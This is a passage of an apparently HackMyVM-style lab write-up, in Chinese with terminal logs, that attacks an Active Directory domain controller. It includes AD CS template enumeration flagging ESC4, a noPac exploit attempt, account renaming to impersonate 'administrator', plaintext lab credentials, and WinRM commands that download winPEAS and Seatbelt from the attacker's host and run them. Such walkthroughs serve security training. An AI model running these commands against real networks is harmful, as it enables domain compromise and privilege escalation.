    Certificate Authorities             : lookback-DC01-CA
1483
    Enabled                             : True
1484
    Client Authentication               : True
1485
    Enrollment Agent                    : False
1486
    Any Purpose                         : False
1487
    Enrollee Supplies Subject           : False
1488
    Certificate Name Flag               : SubjectAltRequireUpn
1489
                                          SubjectAltRequireEmail
1490
                                          SubjectRequireEmail
1491
                                          SubjectRequireDirectoryPath
1492
    Enrollment Flag                     : IncludeSymmetricAlgorithms
1493
                                          PublishToDs
1494
                                          AutoEnrollment
1495
    Private Key Flag                    : ExportableKey
1496
    Extended Key Usage                  : Encrypting File System
1497
                                          Secure Email
1498
                                          Client Authentication
1499
    Requires Manager Approval           : False
1500
    Requires Key Archival               : False
1501
    Authorized Signatures Required      : 0
1502
    Schema Version                      : 1
1503
    Validity Period                     : 1 year
1504
    Renewal Period                      : 6 weeks
1505
    Minimum RSA Key Length              : 2048
1506
    Template Created                    : 2025-10-19T13:52:34+00:00
1507
    Template Last Modified              : 2025-10-19T13:52:34+00:00
1508
    Permissions
1509
      Enrollment Permissions
1510
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
1511
                                          LOOKBACK.HTB\Domain Users
1512
                                          LOOKBACK.HTB\Enterprise Admins
1513
      Object Control Permissions
1514
        Owner                           : LOOKBACK.HTB\Enterprise Admins
1515
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
1516
                                          LOOKBACK.HTB\Enterprise Admins
1517
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
1518
                                          LOOKBACK.HTB\Enterprise Admins
1519
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
1520
                                          LOOKBACK.HTB\Enterprise Admins
1521
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
1522
                                          LOOKBACK.HTB\Domain Users
1523
                                          LOOKBACK.HTB\Enterprise Admins
1524
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
1525
                                          LOOKBACK.HTB\Domain Users
1526
                                          LOOKBACK.HTB\Enterprise Admins
1527
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
1528
    [!] Vulnerabilities
1529
      ESC4                              : Template is owned by user.
1530
    [*] Remarks
1531
      ESC2 Target Template              : Template can be targeted as part of ESC2 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
1532
      ESC3 Target Template              : Template can be targeted as part of ESC3 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.

Bad Ending-NoPac&证书欺诈

NoPac（CVE-2021-42278/42287）

该环境具备域控和 MAQ，理论上可能触发 noPac

Test

ms-DS-MachineAccountQuota 为 10，说明域环境允许普通用户创建机器账户

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# proxychains -q bloodyAD -u 'IT-login-user' -p 'ITLogin!2026#Qw' -d lookback.htb --host 172.16.55.128 get object 'DC=lookback,DC=htb' --attr ms-DS-MachineAccountQuota
3

4
distinguishedName: DC=lookback,DC=htb
5
ms-DS-MachineAccountQuota: 10

Command

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# proxychains -q nxc smb 172.16.55.128 -d lookback.htb -u IT-login-user -p 'ITLogin!2026#Qw' -M nopac
3
SMB         172.16.55.128   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:lookback.htb) (signing:True) (SMBv1:None) (Null Auth:True)
4
SMB         172.16.55.128   445    DC01             [+] lookback.htb\IT-login-user:ITLogin!2026#Qw
5
NOPAC       172.16.55.128   445    DC01             TGT with PAC size 1641
6
NOPAC       172.16.55.128   445    DC01             TGT without PAC size 1641

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# proxychains -q python3 /home/kali/Desktop/tools/noPac/scanner.py lookback.htb/IT-login-user:'ITLogin!2026#Qw' -dc-ip 172.16.55.128
3

4

5
███    ██  ██████  ██████   █████   ██████
6
████   ██ ██    ██ ██   ██ ██   ██ ██
7
██ ██  ██ ██    ██ ██████  ███████ ██
8
██  ██ ██ ██    ██ ██      ██   ██ ██
9
██   ████  ██████  ██      ██   ██  ██████
10

11

12

13
[*] Current ms-DS-MachineAccountQuota = 10
14
[*] Got TGT with PAC from 172.16.55.128. Ticket size 1641
15
[*] Got TGT from 172.16.55.128. Ticket size 1641

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# proxychains -q python3 /home/kali/Desktop/tools/noPac/noPac.py lookback.htb/IT-login-user:'ITLogin!2026#Qw' -dc-ip 172.16.55.128 -use-ldap -dump
3

4
███    ██  ██████  ██████   █████   ██████
5
████   ██ ██    ██ ██   ██ ██   ██ ██
6
██ ██  ██ ██    ██ ██████  ███████ ██
7
██  ██ ██ ██    ██ ██      ██   ██ ██
8
██   ████  ██████  ██      ██   ██  ██████
9

10
[*] Current ms-DS-MachineAccountQuota = 10
11
[*] Selected Target dc01.lookback.htb
12
[*] Total Domain Admins 1
13
[*] will try to impersonate Administrator
14
[*] Adding Computer Account "WIN-I7X138TGYVJ$"
15
[*] MachineAccount "WIN-I7X138TGYVJ$" password = (xjuA$rVynCp
16
[*] Successfully added machine account WIN-I7X138TGYVJ$ with password (xjuA$rVynCp.
17
[*] WIN-I7X138TGYVJ$ object = CN=WIN-I7X138TGYVJ,CN=Computers,DC=lookback,DC=htb
18
[-] Cannot rename the machine account , Reason 00000523: SysErr: DSID-031A1256, problem 22 (Invalid argument), data 0
19

20
[*] Attempting to del a computer with the name: WIN-I7X138TGYVJ$
21
[-] Delete computer WIN-I7X138TGYVJ$ Failed! Maybe the current user does not have permission.

Ending

能拿 TGT、能创建机器账号
重命名机器账号时报 problem 22 (Invalid argument)

证书欺诈

`IT-login-user` 更名 `administrator`（无空格-失败）

1
proxychains -q bloodyAD --host 172.16.55.128 -d lookback.htb -u 'IT-admin' -p 'V9#bT6itAdmin2026!' set object IT-login-user sAMAccountName -v 'administrator'

`IT-login-user` 更名 `administrator`（有空格-成功）

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# proxychains -q bloodyAD --host 172.16.55.128 -d lookback.htb -u 'IT-admin' -p 'V9bT6itAdmin2026' set object 'administrator ' userPrincipalName -v 'administrator@lookback.htb'
3
[+] IT-login-user's sAMAccountName has been updated

为 `administrator` 设置 UPN 为 `administrator@lookback.htb`

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# proxychains -q bloodyAD --host 172.16.55.128 -d lookback.htb -u 'IT-admin' -p 'V9bT6itAdmin2026' set object 'administrator ' userPrincipalName -v 'administrator@lookback.htb'
3
[+] administrator 's userPrincipalName has been updated

核对修改后的属性（sAMAccountName、UPN、SID）

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# proxychains -q bloodyAD --host 172.16.55.128 -d lookback.htb -u 'IT-admin' -p 'V9bT6itAdmin2026' get object 'administrator ' --attr sAMAccountName --attr userPrincipalName --attr objectSid
3

4
distinguishedName: CN=IT-login-user,CN=Users,DC=lookback,DC=htb
5
objectSid: S-1-5-21-3830242231-3868280746-2763890440-1112

Ending

**用户名显示为 ****lookback\administrator**（无尾部空格，系统已自动 trim）。
**SID 为 ****S-1-5-21-3830242231-3868280746-2763890440-1112**，这是 IT-login-user 的原始 SID（RID 1112），不是内置管理员 RID 500。
组成员仅有 **LOOKBACK\IT** 等普通组，无 Domain Admins。
**特权仅包含 **SeMachineAccountPrivilege**（允许将计算机加入域）和 ****SeChangeNotifyPrivilege**，无高权限。
结论：改名成功实现了用户名冒充，但权限未提升。这是一个典型的“名称欺骗”而非“权限劫持”。该账户目前可用于基于名称的证书注册攻击（如 AD CS ESC1），但无法直接 DCSync

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# proxychains -q nxc winrm 172.16.55.128 -d lookback.htb -u 'administrator ' -p 'ITLogin!2026#Qw' -X "whoami /all"
3
WINRM       172.16.55.128   5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb)
4
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
5
  arc4 = algorithms.ARC4(self._key)
6
WINRM       172.16.55.128   5985   DC01             [+] lookback.htb\administrator :ITLogin!2026#Qw (Pwn3d!)
7
WINRM       172.16.55.128   5985   DC01             [+] Executed command (shell type: powershell)
8
WINRM       172.16.55.128   5985   DC01
9
WINRM       172.16.55.128   5985   DC01             USER INFORMATION
10
WINRM       172.16.55.128   5985   DC01             ----------------
11
WINRM       172.16.55.128   5985   DC01
12
WINRM       172.16.55.128   5985   DC01             User Name               SID
13
WINRM       172.16.55.128   5985   DC01             ======================= ==============================================
14
WINRM       172.16.55.128   5985   DC01             lookback\administrator  S-1-5-21-3830242231-3868280746-2763890440-1112
15
WINRM       172.16.55.128   5985   DC01
16
WINRM       172.16.55.128   5985   DC01
17
WINRM       172.16.55.128   5985   DC01             GROUP INFORMATION
18
WINRM       172.16.55.128   5985   DC01             -----------------
19
WINRM       172.16.55.128   5985   DC01
20
WINRM       172.16.55.128   5985   DC01             Group Name                                  Type             SID                                            Attributes
21
WINRM       172.16.55.128   5985   DC01             =========================================== ================ ============================================== ==================================================
22
WINRM       172.16.55.128   5985   DC01             Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
23
WINRM       172.16.55.128   5985   DC01             BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
24
WINRM       172.16.55.128   5985   DC01             BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
25
WINRM       172.16.55.128   5985   DC01             BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
26
WINRM       172.16.55.128   5985   DC01             BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                   Mandatory group, Enabled by default, Enabled group
27
WINRM       172.16.55.128   5985   DC01             NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
28
WINRM       172.16.55.128   5985   DC01             NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
29
WINRM       172.16.55.128   5985   DC01             NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
30
WINRM       172.16.55.128   5985   DC01             LOOKBACK\IT                                 Group            S-1-5-21-3830242231-3868280746-2763890440-1109 Mandatory group, Enabled by default, Enabled group
31
WINRM       172.16.55.128   5985   DC01             NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
32
WINRM       172.16.55.128   5985   DC01             Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448
33
WINRM       172.16.55.128   5985   DC01
34
WINRM       172.16.55.128   5985   DC01
35
WINRM       172.16.55.128   5985   DC01             PRIVILEGES INFORMATION
36
WINRM       172.16.55.128   5985   DC01             ----------------------
37
WINRM       172.16.55.128   5985   DC01
38
WINRM       172.16.55.128   5985   DC01             Privilege Name                Description                    State
39
WINRM       172.16.55.128   5985   DC01             ============================= ============================== =======
40
WINRM       172.16.55.128   5985   DC01             SeMachineAccountPrivilege     Add workstations to domain     Enabled
41
WINRM       172.16.55.128   5985   DC01             SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
42
WINRM       172.16.55.128   5985   DC01             SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
43
WINRM       172.16.55.128   5985   DC01
44
WINRM       172.16.55.128   5985   DC01
45
WINRM       172.16.55.128   5985   DC01             USER CLAIMS INFORMATION
46
WINRM       172.16.55.128   5985   DC01             -----------------------
47
WINRM       172.16.55.128   5985   DC01
48
WINRM       172.16.55.128   5985   DC01             User claims unknown.
49
WINRM       172.16.55.128   5985   DC01
50
WINRM       172.16.55.128   5985   DC01             Kerberos support for Dynamic Access Control on this device has been disabled.

Final Ending-ESC9弱证书映射

winpeas&Seatbelt

upload

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# proxychains -q nxc winrm '172.16.55.128' -d 'lookback.htb' -u 'administrator ' -p 'ITLogin!2026#Qw' -X '$ProgressPreference="SilentlyContinue"; Invoke-WebRequest -UseBasicParsing -Uri "http://172.16.55.193:8000/winPEASx64.exe" -OutFile "C:\ProgramData\winPEASx64.exe"; Invoke-WebRequest -UseBasicParsing -Uri "http://172.16.55.193:8000/Seatbelt.exe" -OutFile "C:\ProgramData\Seatbelt.exe"; Get-Item "C:\ProgramData\Seatbelt.exe","C:\ProgramData\winPEASx64.exe" | Select-Object FullName,Length'
3
WINRM       172.16.55.128   5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb)
4
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
5
  arc4 = algorithms.ARC4(self._key)
6
WINRM       172.16.55.128   5985   DC01             [+] lookback.htb\administrator :ITLogin!2026#Qw (Pwn3d!)
7
WINRM       172.16.55.128   5985   DC01             [+] Executed command (shell type: powershell)
8
WINRM       172.16.55.128   5985   DC01
9
WINRM       172.16.55.128   5985   DC01             FullName                        Length
10
WINRM       172.16.55.128   5985   DC01             --------                        ------
11
WINRM       172.16.55.128   5985   DC01             C:\ProgramData\Seatbelt.exe     556032
12
WINRM       172.16.55.128   5985   DC01             C:\ProgramData\winPEASx64.exe 10170880
13
WINRM       172.16.55.128   5985   DC01

1
┌──(web)─(root㉿kali)-[/home/…/hmv/lookback/myself/tools]
2
└─# updog -p 8000
3
[+] Serving /home/kali/Desktop/hmv/lookback/myself/tools on 0.0.0.0:8000...
4
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
5
 * Running on all addresses (0.0.0.0)
6
 * Running on http://127.0.0.1:8000
7
 * Running on http://61.139.2.134:8000
8
Press CTRL+C to quit
9
172.16.55.128 - - [11/Apr/2026 07:07:50] "GET /winPEASx64.exe HTTP/1.1" 200 -
10
172.16.55.128 - - [11/Apr/2026 07:07:50] "GET /Seatbelt.exe HTTP/1.1" 200 -

run

1
┌──(kali㉿kali)-[~]
2
└─$ proxychains -q nxc winrm '172.16.55.128' -d 'lookback.htb' -u 'administrator ' -p 'ITLogin!2026#Qw' -X 'Start-Process -FilePath "C:\ProgramData\winPEASx64.exe" -ArgumentList "quiet" -RedirectStandardOutput "C:\ProgramData\winpeas_out.txt" -RedirectStandardError "C:\ProgramData\winpeas_err.txt" -WindowStyle Hidden -Wait; Get-Item "C:\ProgramData\winpeas_out.txt","C:\ProgramData\winpeas_err.txt" | Select-Object FullName,Length'
3
WINRM       172.16.55.128   5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb)
4
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
5
  arc4 = algorithms.ARC4(self._key)
6
WINRM       172.16.55.128   5985   DC01             [+] lookback.htb\administrator :ITLogin!2026#Qw (Pwn3d!)
7
WINRM       172.16.55.128   5985   DC01             [+] Executed command (shell type: powershell)
8
WINRM       172.16.55.128   5985   DC01
9
WINRM       172.16.55.128   5985   DC01             FullName                       Length
10
WINRM       172.16.55.128   5985   DC01             --------                       ------
11
WINRM       172.16.55.128   5985   DC01             C:\ProgramData\winpeas_out.txt 129138
12
WINRM       172.16.55.128   5985   DC01             C:\ProgramData\winpeas_err.txt      0

content

1
┌──(kali㉿kali)-[~]
2
└─$ proxychains -q nxc winrm '172.16.55.128' -d 'lookback.htb' -u 'administrator ' -p 'ITLogin!2026#Qw' -X 'Get-Content "C:\ProgramData\winpeas_out.txt"'
3
WINRM       172.16.55.128   5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb)
4
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
5
  arc4 = algorithms.ARC4(self._key)
6
WINRM       172.16.55.128   5985   DC01             [+] lookback.htb\administrator :ITLogin!2026#Qw (Pwn3d!)
7
WINRM       172.16.55.128   5985   DC01             [+] Executed command (shell type: powershell)
8
WINRM       172.16.55.128   5985   DC01              [!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search might take several minutes. For help, run winpeass.exe --help
9
WINRM       172.16.55.128   5985   DC01             ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
10
WINRM       172.16.55.128   5985   DC01             Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
11
WINRM       172.16.55.128   5985   DC01               WinPEAS-ng by @hacktricks_live
12
WINRM       172.16.55.128   5985   DC01
13
WINRM       172.16.55.128   5985   DC01                    /---------------------------------------------------------------------------------\
14
WINRM       172.16.55.128   5985   DC01                    |                             Do you like PEASS?                                  |
15
WINRM       172.16.55.128   5985   DC01                    |---------------------------------------------------------------------------------|
16
WINRM       172.16.55.128   5985   DC01                    |         Learn Cloud Hacking       :     training.hacktricks.xyz                 |
17
WINRM       172.16.55.128   5985   DC01                    |         Follow on Twitter         :     @hacktricks_live                        |
18
WINRM       172.16.55.128   5985   DC01                    |         Respect on HTB            :     SirBroccoli                             |
19
WINRM       172.16.55.128   5985   DC01                    |---------------------------------------------------------------------------------|
20
WINRM       172.16.55.128   5985   DC01                    |                                 Thank you!                                      |
21
WINRM       172.16.55.128   5985   DC01                    \---------------------------------------------------------------------------------/
22
WINRM       172.16.55.128   5985   DC01
23
WINRM       172.16.55.128   5985   DC01               [+] Legend:
24
WINRM       172.16.55.128   5985   DC01                      Red                Indicates a special privilege over an object or something is misconfigured
25
WINRM       172.16.55.128   5985   DC01                      Green              Indicates that some protection is enabled or something is well configured
26
WINRM       172.16.55.128   5985   DC01                      Cyan               Indicates active users
27
WINRM       172.16.55.128   5985   DC01                      Blue               Indicates disabled users
28
WINRM       172.16.55.128   5985   DC01                      LightYellow        Indicates links
29
WINRM       172.16.55.128   5985   DC01
30
WINRM       172.16.55.128   5985   DC01              You can find a Windows local PE Checklist here: https://book.hacktricks.wiki/en/windows-hardening/checklist-windows-privilege-escalation.html
31
WINRM       172.16.55.128   5985   DC01                Creating Dynamic lists, this could take a while, please wait...
32
WINRM       172.16.55.128   5985   DC01                - Loading sensitive_files yaml definitions file...
33
WINRM       172.16.55.128   5985   DC01                - Loading regexes yaml definitions file...
34
WINRM       172.16.55.128   5985   DC01                - Checking if domain...
35
WINRM       172.16.55.128   5985   DC01                - Getting Win32_UserAccount info...
36
WINRM       172.16.55.128   5985   DC01             Error while getting Win32_UserAccount info: System.Management.ManagementException: Access denied
37
WINRM       172.16.55.128   5985   DC01                at System.Management.ThreadDispatch.Start()
38
WINRM       172.16.55.128   5985   DC01                at System.Management.ManagementScope.Initialize()
39
WINRM       172.16.55.128   5985   DC01                at System.Management.ManagementObjectSearcher.Initialize()
40
WINRM       172.16.55.128   5985   DC01                at System.Management.ManagementObjectSearcher.Get()
41
WINRM       172.16.55.128   5985   DC01                at winPEAS.Checks.Checks.CreateDynamicLists(Boolean isFileSearchEnabled)
42
WINRM       172.16.55.128   5985   DC01                - Creating current user groups list...
43
WINRM       172.16.55.128   5985   DC01                - Creating active users list (local only)...
44
WINRM       172.16.55.128   5985   DC01               [X] Exception: Object reference not set to an instance of an object.
45
WINRM       172.16.55.128   5985   DC01                - Creating disabled users list...
46
WINRM       172.16.55.128   5985   DC01               [X] Exception: Object reference not set to an instance of an object.
47
WINRM       172.16.55.128   5985   DC01                - Admin users list...
48
WINRM       172.16.55.128   5985   DC01               [X] Exception: Object reference not set to an instance of an object.
49
WINRM       172.16.55.128   5985   DC01                - Creating AppLocker bypass list...
50
WINRM       172.16.55.128   5985   DC01                - Creating files/directories list for search...
51
WINRM       172.16.55.128   5985   DC01
52
WINRM       172.16.55.128   5985   DC01
53
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ System Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
54
WINRM       172.16.55.128   5985   DC01
55
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Basic System Information
56
WINRM       172.16.55.128   5985   DC01             È Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#version-exploits
57
WINRM       172.16.55.128   5985   DC01               [X] Exception: Access is denied
58
WINRM       172.16.55.128   5985   DC01
59
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Showing All Microsoft Updates
60
WINRM       172.16.55.128   5985   DC01               [X] Exception: Creating an instance of the COM component with CLSID {B699E5E8-67FF-4177-88B0-3684A3388BFB} from the IClassFactory failed due to the following error: 80070005 Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED)).
61
WINRM       172.16.55.128   5985   DC01
62
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ System Last Shutdown Date/time (from Registry)
63
WINRM       172.16.55.128   5985   DC01
64
WINRM       172.16.55.128   5985   DC01                 Last Shutdown Date/time        :    4/10/2026 8:46:46 PM
65
WINRM       172.16.55.128   5985   DC01
66
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ User Environment Variables
67
WINRM       172.16.55.128   5985   DC01             È Check for some passwords or keys in the env variables
68
WINRM       172.16.55.128   5985   DC01                 COMPUTERNAME: DC01
69
WINRM       172.16.55.128   5985   DC01                 PUBLIC: C:\Users\Public
70
WINRM       172.16.55.128   5985   DC01                 LOCALAPPDATA: C:\Users\administrator .LOOKBACK\AppData\Local
71
WINRM       172.16.55.128   5985   DC01                 PSModulePath: C:\Users\administrator .LOOKBACK\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\Microsoft SQL Server\160\Tools\PowerShell\Modules\
72
WINRM       172.16.55.128   5985   DC01                 PROCESSOR_ARCHITECTURE: AMD64
73
WINRM       172.16.55.128   5985   DC01                 Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files (x86)\Microsoft SQL Server\160\Tools\Binn\;C:\Program Files\Microsoft SQL Server\160\Tools\Binn\;C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\;C:\Program Files\Microsoft SQL Server\160\DTS\Binn\;C:\Users\administrator .LOOKBACK\AppData\Local\Microsoft\WindowsApps
74
WINRM       172.16.55.128   5985   DC01                 CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
75
WINRM       172.16.55.128   5985   DC01                 ProgramFiles(x86): C:\Program Files (x86)
76
WINRM       172.16.55.128   5985   DC01                 PROCESSOR_LEVEL: 25
77
WINRM       172.16.55.128   5985   DC01                 ProgramFiles: C:\Program Files
78
WINRM       172.16.55.128   5985   DC01                 PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
79
WINRM       172.16.55.128   5985   DC01                 USERPROFILE: C:\Users\administrator .LOOKBACK
80
WINRM       172.16.55.128   5985   DC01                 SystemRoot: C:\Windows
81
WINRM       172.16.55.128   5985   DC01                 ALLUSERSPROFILE: C:\ProgramData
82
WINRM       172.16.55.128   5985   DC01                 DriverData: C:\Windows\System32\Drivers\DriverData
83
WINRM       172.16.55.128   5985   DC01                 ProgramData: C:\ProgramData
84
WINRM       172.16.55.128   5985   DC01                 PROCESSOR_REVISION: 4401
85
WINRM       172.16.55.128   5985   DC01                 USERNAME: administrator
86
WINRM       172.16.55.128   5985   DC01                 CommonProgramW6432: C:\Program Files\Common Files
87
WINRM       172.16.55.128   5985   DC01                 CommonProgramFiles: C:\Program Files\Common Files
88
WINRM       172.16.55.128   5985   DC01                 OS: Windows_NT
89
WINRM       172.16.55.128   5985   DC01                 PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 68 Stepping 1, AuthenticAMD
90
WINRM       172.16.55.128   5985   DC01                 ComSpec: C:\Windows\system32\cmd.exe
91
WINRM       172.16.55.128   5985   DC01                 SystemDrive: C:
92
WINRM       172.16.55.128   5985   DC01                 TEMP: C:\Users\ADMINI~1.LOO\AppData\Local\Temp
93
WINRM       172.16.55.128   5985   DC01                 NUMBER_OF_PROCESSORS: 4
94
WINRM       172.16.55.128   5985   DC01                 APPDATA: C:\Users\administrator .LOOKBACK\AppData\Roaming
95
WINRM       172.16.55.128   5985   DC01                 TMP: C:\Users\ADMINI~1.LOO\AppData\Local\Temp
96
WINRM       172.16.55.128   5985   DC01                 ProgramW6432: C:\Program Files
97
WINRM       172.16.55.128   5985   DC01                 windir: C:\Windows
98
WINRM       172.16.55.128   5985   DC01                 USERDOMAIN: LOOKBACK
99
WINRM       172.16.55.128   5985   DC01                 USERDNSDOMAIN: lookback.htb
100
WINRM       172.16.55.128   5985   DC01
101
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ System Environment Variables
102
WINRM       172.16.55.128   5985   DC01             È Check for some passwords or keys in the env variables
103
WINRM       172.16.55.128   5985   DC01                 ComSpec: C:\Windows\system32\cmd.exe
104
WINRM       172.16.55.128   5985   DC01                 DriverData: C:\Windows\System32\Drivers\DriverData
105
WINRM       172.16.55.128   5985   DC01                 OS: Windows_NT
106
WINRM       172.16.55.128   5985   DC01                 Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files (x86)\Microsoft SQL Server\160\Tools\Binn\;C:\Program Files\Microsoft SQL Server\160\Tools\Binn\;C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\;C:\Program Files\Microsoft SQL Server\160\DTS\Binn\
107
WINRM       172.16.55.128   5985   DC01                 PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
108
WINRM       172.16.55.128   5985   DC01                 PROCESSOR_ARCHITECTURE: AMD64
109
WINRM       172.16.55.128   5985   DC01                 PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\Microsoft SQL Server\160\Tools\PowerShell\Modules\
110
WINRM       172.16.55.128   5985   DC01                 TEMP: C:\Windows\TEMP
111
WINRM       172.16.55.128   5985   DC01                 TMP: C:\Windows\TEMP
112
WINRM       172.16.55.128   5985   DC01                 USERNAME: SYSTEM
113
WINRM       172.16.55.128   5985   DC01                 windir: C:\Windows
114
WINRM       172.16.55.128   5985   DC01                 NUMBER_OF_PROCESSORS: 4
115
WINRM       172.16.55.128   5985   DC01                 PROCESSOR_LEVEL: 25
116
WINRM       172.16.55.128   5985   DC01                 PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 68 Stepping 1, AuthenticAMD
117
WINRM       172.16.55.128   5985   DC01                 PROCESSOR_REVISION: 4401
118
WINRM       172.16.55.128   5985   DC01
119
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Audit Settings
120
WINRM       172.16.55.128   5985   DC01             È Check what is being logged
121
WINRM       172.16.55.128   5985   DC01                 Not Found
122
WINRM       172.16.55.128   5985   DC01
123
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Audit Policy Settings - Classic & Advanced
124
WINRM       172.16.55.128   5985   DC01
125
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ WEF Settings
126
WINRM       172.16.55.128   5985   DC01             È Windows Event Forwarding, is interesting to know were are sent the logs
127
WINRM       172.16.55.128   5985   DC01                 Not Found
128
WINRM       172.16.55.128   5985   DC01
129
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ LAPS Settings
130
WINRM       172.16.55.128   5985   DC01             È If installed, local administrator password is changed frequently and is restricted by ACL
131
WINRM       172.16.55.128   5985   DC01                 LAPS Enabled: LAPS not installed
132
WINRM       172.16.55.128   5985   DC01
133
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Wdigest
134
WINRM       172.16.55.128   5985   DC01             È If enabled, plain-text crds could be stored in LSASS https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#wdigest
135
WINRM       172.16.55.128   5985   DC01                 Wdigest is not enabled
136
WINRM       172.16.55.128   5985   DC01
137
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ LSA Protection
138
